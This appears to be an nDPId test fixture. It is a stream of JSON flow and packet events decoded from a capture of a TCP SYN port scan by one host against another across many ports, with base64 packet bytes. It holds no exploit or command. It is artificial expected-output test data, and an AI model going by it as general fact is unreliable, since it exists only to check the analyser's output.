+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GYAADIGKgysEAAIQA2GNIzSAu3dUoMYAAAAAGACDAApogAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAstAUAADoGWm2sEAAIQA2GNIzSBRXdUoMYAAAAAGACDAAnegAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAs55oAADAGMNisEAAIQA2GNIzSH0LdUoMYAAAAAGACBAAVTQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAsdFgAADoGmhqsEAAIQA2GNIzSH6PdUoMYAAAAAGACDAAM7AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059515,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059515,"pkt":"ACYLMQczACWzv5HuCABFAAAswkMAADQGUi+sEAAIQA2GNIzSC9bdUoMYAAAAAGACBAAouQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsixEAADEGjGGsEAAIQA2GNIzSBAfdUoMYAAAAAGACCAAsiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsfV4AADkGkhSsEAAIQA2GNIzSCADdUoMYAAAAAGACCAAojwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059516,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059516,"pkt":"ACYLMQczACWzv5HuCABFAAAsleYAAC8Gg4ysEAAIQA2GNIzSGZPdUoMYAAAAAGACEAAO\/AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRgAADgGm1qsEAAIQA2GNIzTBAzdU4MZAAAAAGACBAAwgAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs8c8AAC8GJ6OsEAAIQA2GNIzTTiXdU4MZAAAAAGACEADaZgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAs1WcAADIGQQusEAAIQA2GNIzT2TDdU4MZAAAAAGACDABTWwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsusMAACYGZ6+sEAAIQA2GNIzTIGTdU4MZAAAAAGACDAAMKAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059517,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059517,"pkt":"ACYLMQczACWzv5HuCABFAAAsMsoAADoG26isEAAIQA2GNIzTJxHdU4MZAAAAAGACDAAFewAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjcAADIGmDusEAAIQA2GNIzTA\/HdU4MZAAAAAGACDAAomwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIUEAADsG7DGsEAAIQA2GNIzTBa\/dU4MZAAAAAGACEAAi3QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIGkAADsG7QmsEAAIQA2GNIzTI4PdU4MZAAAAAGACEAAFCQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs8WwAADAGJwasEAAIQA2GNIzTBMDdU4MZAAAAAGACBAAvzAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs4isAADYGMEesEAAIQA2GNIzTCE7dU4MZAAAAAGACDAAkPgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa44AADEGq+SsEAAIQA2GNIzTBP3dU4MZAAAAAGACCAArjwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAse3cAADIGmvusEAAIQA2GNIzTF2TdU4MZAAAAAGACDAAVKAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjUAADcGmz2sEAAIQA2GNIzTBCLdU4MZAAAAAGACEAAkagAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsodUAADUGcZ2sEAAIQA2GNIzTBODdU4MZAAAAAGACCAArrAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsNa8AAC4G5MOsEAAIQA2GNIzTIzHdU4MZAAAAAGACDAAJWwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+sAACoGsoesEAAIQA2GNIzTBKHdU4MZAAAAAGACDAAn6wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 